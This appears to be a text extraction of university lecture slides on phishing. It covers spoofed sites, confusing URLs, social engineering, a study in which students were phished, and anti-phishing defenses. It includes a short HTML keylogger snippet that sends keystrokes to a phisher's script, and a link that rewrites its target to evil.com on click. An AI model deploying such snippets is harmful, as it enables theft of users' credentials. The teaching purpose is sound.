Vitaly Shmatikov CS 361S Phishingslide 2 $1,500,000,000 Global losses from phishing in 2012 estimated at $1.5 Billion Source: RSA Fraud Reportslide 3 MillerSmiles.co.ukslide 4 A Snapshot of My Mailbox [email protected] 5 A Closer Look From: “Wells Fargo” <[email protected]> <a target=“_blank” href=“http://www.members.axion.net/~rod/.Wells.Fargo.com” > https://online.wellsfargo.com/signon?LOB=CONS</a> What you’ll see on the page Where the link actually goesslide 6 And You End Up Hereslide 7 Thank Goodness for IE Typical Properties of Spoofed Sites Show logos found on the honest site • Copied image files or links to the honest site Have suspicious URLs Ask for user input • Debit card number, SSN, mother’s maiden name, … HTML copied from the honest site • May contain links to the honest site • May contain revealing mistakes Short-lived (cannot effectively blacklist) • Often hosted on compromised zombie machines slide 8slide 9 A Typical Phishing Page • Weird URL • http instead of httpsslide 10 Phishing Techniques Use confusing URLs • http://gadula.net/.Wells.Fargo.com/signin.html Use URL with multiple redirection • http://www.chase.com/url.php?url=“http://phish.com” Host phishing sites on botnet zombies • Move from bot to bot using dynamic DNS Pharming • Poison DNS tables so that address typed by victim (e.g., www.paypal.com) points to the phishing site • URL checking doesn’t help!slide 11 Trusted Input Path Problem Users are easily tricked into entering passwords into insecure non-password fields <input type="text" name="spoof" onKeyPress="(new Image()).src= ’keylogger.php?key=’ + String.fromCharCode( event.keyCode ); event.keyCode = 183;” > Sends keystroke to phisher Changes character to *slide 12 Social Engineering Tricks Create a bank page advertising an interest rate slightly higher than any real bank; ask users for their credentials to initiate money transfer • Some victims provided their bank account numbers to “Flintstone National Bank” of “Bedrock, Colorado” Exploit social relationships • Spoof an email from a Facebook friend • In a West Point experiment, 80% of cadets were deceived into following an embedded link regarding their grade report from a fictitious colonelslide 13 Facebook Phishing (January 2012) Attack steals Facebook credentials Changes profile picture of compromised account to and the name to “Fącebooƙ Şecurițy” • Notice anything? Sends a message to all contacts: http://www.securelist.com/en/blog/208193325/Facebook_Security_Phishing_Attack_In_The_Wildslide 14 “Payment Verification” http://www.securelist.com/en/blog/208193325/Facebook_Security_Phishing_Attack_In_The_Wildslide 15 Experiments at Indiana U. (2006) Reconstructed the social network by crawling sites like Facebook, MySpace, LinkedIn Sent 921 Indiana University students a spoofed email that appeared to come from their friend Email redirected to a spoofed site inviting the user to enter his/her secure university credentials • Domain name clearly distinct from indiana.edu 72% of students entered their real credentials into the spoofed site (most within first 12 hrs) • Males more likely to do this if email is from a female [Jagatic et al.]slide 16 Who Are The Biggest Suckers? [Jagatic et al.]slide 17 Seven Stages of Grief [according to Elizabeth Kübler-Ross] • Shock or disbelief • Denial • Bargaining • Guilt • Anger • Depression • Acceptanceslide 18 Victims’ Reactions (1) Anger • Subjects called the experiment unethical, inappropriate, illegal, unprofessional, fraudulent, self-serving, useless • They called for the researchers conducting the study to be fired, prosecuted, expelled, or reprimanded Denial • No posted comments included an admission that the writer had fallen victim to the attack • Many posts stated that the poster did not and would never fall for such an attack, and they were speaking on behalf of friends who had been phished [Jagatic et al.]slide 19 Victims’ Reactions (2) Misunderstanding • Many subjects were convinced that the experimenters hacked into their email accounts - they believed it was the only possible explanation for the spoofed messages Underestimation of privacy risks • Many subjects didn’t understand how the researchers obtained information about their friends, and assumed that the researchers accessed their address books • Others, understanding that the information was mined from social network sites, objected that their privacy had been violated by the researchers who accessed the information that they had posted online [Jagatic et al.]Safe to Type Your Password? slide 20slide 21 Safe to Type Your Password?Safe to Type Your Password? slide 22Safe to Type Your Password? slide 23Picture-in-Picture Attacks Trained users are more likely to fall victim to this! slide 24Status Bar Is Trivially Spoofable <a href=“http://www.paypal.com/” onclick=“this.href = ‘http://www.evil.com/’;”> PayPal</a> slide 25slide 26 Site Defense #1: PassMark / SiteKey If you don’t recognize your personalized SiteKey, don’t enter your Passcodeslide 27 Site Defense #2: PIN Guard Use your mouse to click the number, or use your keyboard to type the lettersslide 28 Site Defense #2A: Scramble Pad Enter access code by typing letters from randomly generated Scramble Padslide 29 Site Defense #3: Virtual Keyboard Use your mouse to select characters from the virtual keyboardslide 30 Site Defense #4: Bharosa Slider On first login, user picks a symbol. On subsequent logins all letters and numbers in the PIN must be chosen using correct symbol.slide 31 Anti-Phishing Features in IE7slide 32 CMU study of 60 users Asked to make eBay and Amazon purchases All were sent phishing messages in addition to the real purchase confirmations Goal: compare active and passive warnings • Passive (IE): address bar changes color, pop-up box tells the user that the site is suspicious • Active (IE): full-screen warning, must click on “Continue to this website (not recommended)” to get to site • Active (Firefox): “Reported Web forgery” dialog, must click on “Ignore this warning” to get to site Are Phishing Warnings Effective? [Egelman et al.]slide 33 Active warnings significantly more effective
View Full Document